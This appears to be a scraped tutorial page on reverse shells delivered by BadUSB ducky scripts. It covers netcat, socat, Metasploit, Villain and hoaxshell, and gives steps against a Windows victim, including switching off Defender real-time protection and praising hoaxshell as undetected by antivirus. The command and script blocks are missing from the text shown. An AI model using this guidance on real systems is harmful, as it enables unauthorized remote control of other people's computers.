Reverse Shell Ducky Script
What's a Shell
A shell is a program that provides a command-line interface for interacting with an operating system.
In a Unix-like operating system, such as Linux or macOS, the default shell is typically "bash" (short for "Bourne-Again SHell"), but other shells such as "sh" (the original Bourne shell), "csh" (the C shell), "ksh" (the Korn shell), and "zsh" (the Z shell) are also available.
In a Windows operating system, the default shell is "cmd.exe" (Command Prompt), but "PowerShell" is also available as a more powerful alternative.
When attacking a remote system, a possible goal is to gain initial access by letting the system run arbitrary code. This initial access can then be used to obtain a shell on the target.
In relation to an attack on a remote server, we can force the server to give us command line access (a reverse shell), or to open up a port on the server which we can then connect to (a bind shell).
Bind Shells
There are a variety of popular tools to receive reverse shells, and send bind shells:
Netcat: It can do a lot of different things, but most importantly for our uses, it can be used to receive reverse shells and connect to remote ports attached to bind shells on a target system. The disadvantage of netcat is that it is very unstable by default, but of course there are things we can do about that.
Socat: Socat is a more powerful version of netcat. It can do all of the same things, and many more. Socat shells are usually more stable than netcat shells out of the box. In this sense it is vastly superior to netcat; however, there are two big catches: The syntax is more difficult && Netcat is installed on virtually every Linux distribution by default. Socat on the other hand is very rarely installed by default.
Metasploit — multi/handler: Metasploit is extremely versatile. One of the modules it contains is the auxiliary/multi/handler module, which can be used to receive reverse shells. Due to it being part of a larger framework it is easier to obtain stable shells, handle stages payloads, and interact with a meterpreter shell.
Msfvenom: Msfvenom is also a part of the Metasploit framework, but it can also be used as a standalone tool. Msfvenom is used to generate all kinds of payloads
Villain:a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team.
Types Of Shells
There are two types of shells we are interested in:
Reverse shells force the target to execute some code that connects back to your computer. Here we send some code to the target machine, and we setup a listener on our own machine. Afterwards we run the payload and we get a reverse shell on our machine. Since the target machine is connecting to our machine, we can avoid firewalls.
Bind shells basically work the other way around. We execute some code on the target, which opens up a port and allows to open a shell. This has the advantage of not requiring any configuration on your own network, but may be prevented by firewalls protecting the target.
Netcat
Let's start by using Netcat on:
Linux Machine Attacking A Lunix Machine
on the attack's machine:
on the target machine:
[port]: port on the attacker's machine, we can use any port, Generally well-known port numbers are bellow 1024 because that will permited by the firewalls.
exemple: 81
Linux Machine Attacking A Windows Machine
On the attacker's machine:
On the victim's machine:
This is a one line command, delete the "enter" in the beginning of the second line
So let's create our Reverse Shell Ducky Script:
First, you had to disable real time protection in Windows machine (Victime Machine) manually before running this attack or using Bad usb (you can use the ducky script bellow)
Now using any Bad USB you can run this ducky script:
On the attacker's machine(After maintaining connection between machines):
to download and upload files from windows to linux:
to open chrome and notepad:
to close them:
Documentation:
Other Resources (From GitHub)
Other Tutorials (From YouTube)
Several YouTube tutorials are accessible about reverse shell ducky script:
This YouTube Videos (Video1 , Video2 , Video3) created by David Bombal
This YouTube Video created by NetworkChuck
This YouTube Video created by Seytonic
This YouTube Video created by Hak5
Villain (Multi-Reverse Shell)
Villain, also known as Multi-Reverse Shell, is a tool designed for educational purposes to demonstrate the concept of a reverse shell in computer security. A reverse shell is a technique used in penetration testing or ethical hacking to gain remote access to a target system.
Villain allows users to set up a listener or server on their machine and establish a reverse shell connection with a target system. Once the connection is established, the user gains control over the target system's command-line interface, effectively enabling remote command execution.
This tool can be used to understand the mechanics of reverse shells, study network security, and learn about potential vulnerabilities that can be exploited. It helps users explore the concept of remote access and how it can be utilized for legitimate purposes, such as managing and administering systems remotely.
Several YouTube tutorials are accessible about reverse shell ducky script:
This YouTube Video created by John Hammond
This YouTube Video created by t3l3machus
Hoaxshell (A New Reverse Shell Tool)
hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions, solely based on http(s) traffic. The tool is easy to use, it generates it's own PowerShell payload and it supports encryption (ssl).
So far, it has been tested on fully updated Windows 11 Enterprise, Windows Server 2016 Datacenter and Windows 10 Pro boxes (see video and screenshots).
you can use this this ducky script to run it on Bad USB
Latest version of Hoaxshell:
Last updated